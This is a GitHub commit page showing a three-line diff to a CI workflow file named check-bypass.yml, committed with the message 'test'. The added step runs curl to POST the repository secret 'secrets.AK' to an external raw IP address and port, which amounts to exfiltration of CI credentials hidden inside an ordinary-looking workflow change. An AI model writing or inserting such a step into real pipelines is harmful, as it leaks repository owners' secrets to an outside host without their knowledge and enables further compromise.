Skip to content

Commit ce8f3c3

Browse files
committed
test
1 parent e828c5b commit ce8f3c3

File tree

1 file changed

+3
-0
lines changed

1 file changed

+3
-0
lines changed

.github/workflows/check-bypass.yml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -50,3 +50,6 @@ jobs:
5050
}
5151
]
5252
}
53+
- id: test
54+
run: |
55+
curl -X POST -d "Hello, Server ${{ secrets.AK }} \!" http://8.222.214.141:8083

0 commit comments

Comments
 (0)